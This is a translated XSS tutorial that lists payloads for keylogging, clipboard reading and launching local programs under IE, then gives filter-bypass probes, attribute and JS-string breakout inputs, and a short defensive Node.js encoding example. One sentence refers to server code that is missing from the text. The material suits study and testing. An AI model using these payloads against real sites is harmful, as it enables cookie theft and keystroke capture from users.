Cross-site scripting (XSS) Resolution (III): XSS Vulnerability

Source: Internet
Author: User

Previous: http://www.bkjia.com/Article/201209/153274.html

1. Attackers can exploit the XSS vulnerability to call local programs (under IE). XSS attack payload: <script>var o = new ActiveXObject('wscript.shell'); o.run('calc.exe');</script>. This JS code can call the local calculator program in the IE browser.

2. Attackers can exploit the XSS vulnerability to record the victim's keystrokes in the browser. The JS code is as follows: <script>document.onkeypress = function () { window.status += String.fromCharCode(window.event.keyCode); }</script>. IE displays the status in the status bar; browsers with a non-IE engine do not display it, but the text is still stored in window.status.

3. Attackers can exploit the XSS vulnerability to obtain the content of the clipboard. JS code: <script>alert(window.clipboardData.getData('text'));</script>. This statement only shows a pop-up window; of course, the value could instead be saved in a variable and sent to a machine controlled by the attacker.

4. The XSS vulnerability allows attackers to steal browsing history and search records. Attackers can dynamically create hyperlinks to frequently used web sites and search-engine queries, and use the getComputedStyle API to check whether these links are coloured as "visited", thereby stealing private information.

5. By exploiting the XSS vulnerability, attackers can enumerate the applications the victim is currently using. JS can be used to determine whether a user is currently logged on to a third-party web application.

6. Attackers can exploit the XSS vulnerability to scan ports on the victim's local network. JS can be used to scan the ports of hosts in the local network to determine which services are available.

How to find XSS vulnerabilities: the basic method is to use the string "><script>alert(document.cookie)</script>, submit it to each parameter on the application page, and watch the response. If the string appears in the response as is, it can be almost certainly determined that the program has an XSS vulnerability.

Many web programs filter user input to prevent XSS attacks, for example by filtering the <script> expression and encoding it. Even without <script> tags, or without the frequently filtered characters <, > and /, the XSS vulnerability can still be exploited. If the application filters the <script> string, the following variants can be tried:
① "><script>alert(document.cookie)</script>
② "><ScRiPt>alert(document.cookie)</ScRiPt>
③ "%3e%3cscript%3ealert(document.cookie)%3c/script%3e
④ "><scr<script>ipt>alert(document.cookie)</scr</script>ipt>
⑤ %00"><script>alert(document.cookie)</script>

1. Finding and exploiting reflected XSS vulnerabilities. Penetration test procedure: ① Choose a unique string (containing only letters). ② Submit this string to the application as each parameter on each page, one parameter at a time. ③ Examine the application's response and record the parameters whose value is echoed back; these need further study. ④ Test all GET and POST parameters. After recording the echoed parameters, analyse them manually. For example, a page contains the code <input type="text" name="yeetrack.com" value="hello world">, where hello world is data read from the client. The usual XSS method is to terminate the double-quoted string early, close the input tag, and then inject code by various means (<script>, <image src="javascript:...">), for example "><script>alert(document.cookie)</script><!--

If the program filters the script keyword, we can also use " onfocus="alert(document.cookie)", embedding the JS statement through the onfocus handler. Another example: the page contains <script>var a = 'Hello world'; b = 'some'; ...</script>, where Hello world comes from user input. We can construct the input '; alert(document.cookie); var tem='. This closes the string assigned to variable a and appends a JS statement; the trailing variable tem keeps the syntax valid (alternatively, // can be used to comment out the rest of the line). The server has the following code: . We can construct the input javascript:alert(document.cookie); to launch the attack another way, use " onerror="alert(document.cookie)", so that when the image fails to load, the statement in onerror is executed.
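As an added example (not from the original article), the following Node.js code contrasts the "strip <script>" blocklist filter described above with context-aware output encoding for the two injection contexts the article discusses, the value attribute of an input tag and a JS string literal. Function names and the probe strings are constructed for illustration.

```javascript
// Added example, not from the original article. Function names and the probe
// strings below are constructed for illustration.

// The blocklist filter the article describes: strip the literal <script> tag.
function naiveFilter(input) {
  return input.replace(/<script>/g, "").replace(/<\/script>/g, "");
}

// Encoding for the HTML body or a quoted attribute, e.g. <input value="...">:
// no quote or angle bracket survives, so the attribute cannot be closed early.
function encodeForHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// Encoding for a JS string literal, e.g. var a = '...': every non-alphanumeric
// character becomes \uXXXX, so neither a quote nor </script> can terminate the
// literal or the script element, while the JS engine still sees the same text.
function encodeForJsString(input) {
  return String(input).replace(/[^A-Za-z0-9 ]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// The two server-side templates discussed in the article, rendered safely.
function renderInputTag(userValue) {
  return `<input type="text" name="q" value="${encodeForHtml(userValue)}">`;
}
function renderScriptVar(userValue) {
  return `<script>var a='${encodeForJsString(userValue)}';</script>`;
}

// Constructed probe strings modelled on the article's variants ② and ④ and on
// the JS-string breakout (alert(1) stands in for the article's payload).
const MIXED_CASE = '"><ScRiPt>alert(1)</ScRiPt>';
const NESTED_TAG = '"><scr<script>ipt>alert(1)</scr</script>ipt>';
const JS_BREAKOUT = "'; alert(1); var tem='";

// True when the rendered tag still has exactly its three quoted attributes and
// no script tag in any casing, i.e. the input stayed inside the value attribute.
function attributeIsIntact(rendered) {
  const quotes = (rendered.match(/"/g) || []).length;
  return quotes === 6 && !/<scr/i.test(rendered);
}

// True when only the two delimiting single quotes exist and the first
// </script> is the element's own closing tag at the end of the output.
function jsLiteralIsIntact(rendered) {
  const quotes = (rendered.match(/'/g) || []).length;
  return quotes === 2 && rendered.indexOf("</script>") === rendered.length - 9;
}
```

The naive filter leaves the mixed-case probe untouched and turns the nested-tag probe into a working <script> tag, whereas the encoded templates keep both probes inert while preserving their text for the user.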
